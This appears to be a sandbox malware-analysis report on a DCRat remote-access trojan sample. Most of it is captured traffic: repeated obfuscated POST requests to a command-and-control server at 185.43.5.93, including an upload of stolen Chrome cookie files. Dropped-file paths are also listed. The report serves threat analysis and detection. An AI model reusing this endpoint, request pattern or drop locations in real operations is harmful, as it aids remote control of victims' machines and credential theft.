Dec 10, 2024 07:33:27.878232956 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:28.235726118 CET	1764	OUT	Data Raw: 5a 55 5c 5f 58 5f 53 5a 58 5f 51 55 5a 5a 58 55 56 56 58 54 56 5b 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZU\_X_SZX_QUZZXUVVXTV[P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["/"E$9 #5X,:$-+*4,Q<)(;C'-8X0!^" \)1
Dec 10, 2024 07:33:29.216737032 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:29.451431036 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 25 00 23 59 28 10 24 2b 23 54 24 2a 26 50 2a 27 03 00 3f 02 31 00 3c 0d 23 05 3f 01 31 13 21 34 0e 5e 27 2d 22 52 30 2c 25 0f 25 1e 2e 5e 0c 10 38 17 23 28 2b 02 2b 2e 30 03 29 59 31 05 29 3c 02 05 32 2f 23 5d 27 3a 23 11 33 2b 35 53 24 05 2d 10 29 29 00 5d 28 08 3b 0d 26 12 2e 56 0b 12 23 1f 3d 07 28 13 33 3e 3c 0f 3e 58 21 0d 23 5c 3a 13 20 5a 23 58 36 28 26 13 29 22 34 11 30 31 09 57 33 39 38 5f 34 05 25 15 26 32 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%#Y($+#T$&P'?1<#?1!4^'-"R0,%%.^8#(++.0)Y1)<2/#]':#3+5S$-))](;&.V#=(3><>X!#\: Z#X6(&)"401W398_4%&2$P,(U>WT0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:28.036525965 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:28.391923904 CET	1048	OUT	Data Raw: 5f 55 59 5a 5d 52 53 5a 58 5f 51 55 5a 5f 58 52 56 50 58 5e 56 58 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _UYZ]RSZX_QUZ_XRVPX^VXPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\8"$#1#3&8&^$=?)/ 'Q<25T*8"'>73!^" \)%
Dec 10, 2024 07:33:29.364178896 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:29.603425026 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:29.906306982 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:30.251306057 CET	1048	OUT	Data Raw: 5f 54 5c 59 5d 59 56 50 58 5f 51 55 5a 58 58 52 56 53 58 59 56 51 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _T\Y]YVPX_QUZXXRVSXYVQP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["]82)D3#)V#U%85'X??%73<!&*&'>'0!^" \)9
Dec 10, 2024 07:33:31.225570917 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:31.459662914 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:31.744492054 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:32.095103979 CET	1048	OUT	Data Raw: 5a 57 5c 5a 5d 59 56 50 58 5f 51 55 5a 5d 58 54 56 52 58 5a 56 50 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZW\Z]YVPX_QUZ]XTVRXZVPPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["Y/1*$U=4989.\3>#+Y:#/??)+=E$'0!^" \)-
Dec 10, 2024 07:33:33.074024916 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:33.303427935 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KyC6hVwU8Z.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe

C:\Program Files (x86)\MSBuild\Microsoft\f6900929d627b7

C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe

C:\Program Files (x86)\Windows NT\Accessories\en-US\f6900929d627b7

C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe

C:\Program Files\Reference Assemblies\Microsoft\Framework\f6900929d627b7

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KyC6hVwU8Z.exe_7ae57f7c7248cf8588555b1b76c76a3e9159bd9e_efcfc7cc_9a479775-244e-4fbe-910c-fcea0d05881f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7596.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7604.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7663.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\pPTyCqA3ru.exe.log

C:\Users\user\AppData\Local\Temp\03wv9wpG7H

Windows Analysis Report
KyC6hVwU8Z.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:33.556442022 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:33.907604933 CET	1044	OUT	Data Raw: 5a 53 5c 5f 5d 5b 56 5a 58 5f 51 55 5a 5e 58 56 56 51 58 55 56 5d 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZS\_][VZX_QUZ^XVVQXUV]P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/!%A3=W U>,)13=+X+"4$(T*)+5C3<Z$8!^" \)-

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:34.590481997 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:34.938826084 CET	1764	OUT	Data Raw: 5a 53 59 5b 5d 5d 56 5a 58 5f 51 55 5a 58 58 55 56 51 58 5f 56 5a 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZSY[]]VZX_QUZXXUVQX_VZPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[";=0%T##;$4+Y*!,7<9Q)89C'><Z&8!^" \)9
Dec 10, 2024 07:33:35.930350065 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:36.163763046 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 26 58 23 3f 2c 13 25 02 38 0f 24 03 39 0f 28 34 22 16 2a 2c 04 5b 2b 1d 05 07 3f 06 31 11 21 34 20 5f 27 03 29 0d 33 01 35 0a 32 0e 2e 5e 0c 10 38 5b 21 3b 30 5a 2b 00 23 5a 3e 11 29 05 28 3f 24 03 31 05 30 02 27 03 28 04 30 06 25 17 30 02 22 05 3e 5f 2e 5b 3c 08 3b 0c 25 02 2e 56 0b 12 23 1f 3e 00 2b 06 33 03 09 56 3e 00 39 0c 22 39 22 11 37 02 23 11 21 38 03 07 3e 0b 28 5e 30 21 02 0c 24 2a 2c 5d 34 02 35 1b 27 22 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&X#?,%8$9(4",[+?1!4 _')352.^8[!;0Z+#Z>)(?$10'(0%0">_.[<;%.V#>+3V>9"9"7#!8>(^0!$,]45'"$P,(U>WT0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:34.964966059 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:35.313838959 CET	1048	OUT	Data Raw: 5a 53 59 5f 5d 5f 56 5e 58 5f 51 55 5a 5c 58 5c 56 54 58 5f 56 50 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZSY_]_V^X_QUZ\X\VTX_VPP]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!;%'35U7-8:5';[+=4?7+T%U)]!@3=X3!^" \))
Dec 10, 2024 07:33:36.321985006 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:36.555479050 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:36.809101105 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:37.157524109 CET	1048	OUT	Data Raw: 5a 52 5c 5d 58 5e 56 50 58 5f 51 55 5a 57 58 5d 56 55 58 58 56 59 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZR\]X^VPX_QUZWX]VUXXVYP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/=$#4 =];*$>4?Y% /4+T9)'-X0!^" \)
Dec 10, 2024 07:33:38.135507107 CET	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:38.148473978 CET	348	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----6Bb2TGQW3wrvnAZPjUVj3vIvEUSrxVXwXU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 15834 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:38.501379013 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 42 62 32 54 47 51 57 33 77 72 76 6e 41 5a 50 6a 55 56 6a 33 76 49 76 45 55 53 72 78 56 58 77 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------6Bb2TGQW3wrvnAZPjUVj3vIvEUSrxVXwXUContent-Disposition: form-data; name="0"Content-Type: text/plainZW\X]XV]X_QUZ\XVVWX\VXPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]
Dec 10, 2024 07:33:38.621037960 CET	3474	OUT	Data Raw: 49 51 41 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 2f 41 77 41 41 51 6e 4a 76 64 33 4e 6c 63 6e 4d 76 51 32 39 76 61 32 6c 6c 63 31 74 44 61 48 4a 76 62 57 56 64 49 30 64 74 53 48 59 75 64 48 68 30 43 67 41 67 41 41 41 41 41 41 41 42 41 42 Data Ascii: IQAkAAAAAAAAAAAAAAB/AwAAQnJvd3NlcnMvQ29va2llc1tDaHJvbWVdI0dtSHYudHh0CgAgAAAAAAABABgATo05N9tL2wFOjTk320vbAU6NOTfbS9sBUEsBAi0AFAAACAgAlU2LWcCL6QjoAAAAIQEAACEAJAAAAAAAAAAAAAAAygQAAEJyb3dzZXJzL0Nvb2tpZXNbQ2hyb21lXSNCVHlwLnR4dAoAIAAAAAAAAQAYAE6NOTf
Dec 10, 2024 07:33:39.487857103 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:39.723537922 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:38.296608925 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:38.642000914 CET	1048	OUT	Data Raw: 5f 55 5c 50 5d 59 53 58 58 5f 51 55 5a 5c 58 53 56 53 58 5e 56 51 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _U\P]YSXX_QUZ\XSVSX^VQPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/5A'#1#3]/*X0- +?)R!<,+>C3- Y$8!^" \))
Dec 10, 2024 07:33:39.626898050 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:39.859477043 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:40.103610039 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:40.454638004 CET	1048	OUT	Data Raw: 5f 53 5c 51 5d 58 56 50 58 5f 51 55 5a 59 58 53 56 5a 58 55 56 5c 50 59 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _S\Q]XVPX_QUZYXSVZXUV\PYPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/!E$)U !]/:Y'=$?<=V#7+>;&0>8X'(!^" \)

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:41.293484926 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:41.641968966 CET	1764	OUT	Data Raw: 5a 54 59 5c 58 5a 53 5f 58 5f 51 55 5a 59 58 55 56 57 58 58 56 5b 50 59 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZTY\XZS_X_QUZYXUVWXXV[PYPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["X85$9 #,2_$[?\(/)R7++2V;!B&>?'(!^" \)
Dec 10, 2024 07:33:42.633164883 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:42.867526054 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 25 02 37 11 2f 01 26 3b 09 55 27 3a 25 0c 2a 37 3d 07 3f 3c 0f 03 3c 20 3c 5a 2b 5e 39 59 21 37 28 16 24 2d 08 57 24 2f 00 53 24 34 2e 5e 0c 10 38 16 22 5e 3f 05 28 3e 05 11 3e 59 22 59 28 3f 24 02 26 2f 2b 10 26 39 34 02 27 28 31 19 25 2f 3d 5a 3e 00 25 05 3c 57 38 50 26 28 2e 56 0b 12 20 0f 3d 5f 24 5f 24 04 3f 54 2a 07 22 56 20 5c 31 01 37 05 27 5b 36 38 39 01 29 21 3c 5b 27 1f 0d 56 24 17 20 5a 37 2c 22 0e 32 22 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%7/&;U':%7=?<< <Z+^9Y!7($-W$/S$4.^8"^?(>>Y"Y(?$&/+&94'(1%/=Z>%<W8P&(.V =_$_$?T"V \17'[689)!<['V$ Z7,"2"$P,(U>WT0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:41.415687084 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:41.766963959 CET	1044	OUT	Data Raw: 5f 55 5c 51 5d 53 56 5d 58 5f 51 55 5a 5e 58 52 56 51 58 58 56 5b 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _U\Q]SV]X_QUZ^XRVQXXV[P_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["85$#!35Z;9*X0>;\)?"!,Q+16)5'.<]$!^" \)
Dec 10, 2024 07:33:42.744828939 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:42.979509115 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:43.227819920 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:43.579487085 CET	1048	OUT	Data Raw: 5a 53 5c 5e 5d 5b 56 50 58 5f 51 55 5a 5c 58 5c 56 5b 58 5e 56 58 50 5f 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZS\^][VPX_QUZ\X\V[X^VXP_PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!,T:&3V7U)[,*'=\(=4<,(!9U=+E$ Y$!^" \))
Dec 10, 2024 07:33:44.566890001 CET	25	IN	HTTP/1.1 100 Continue
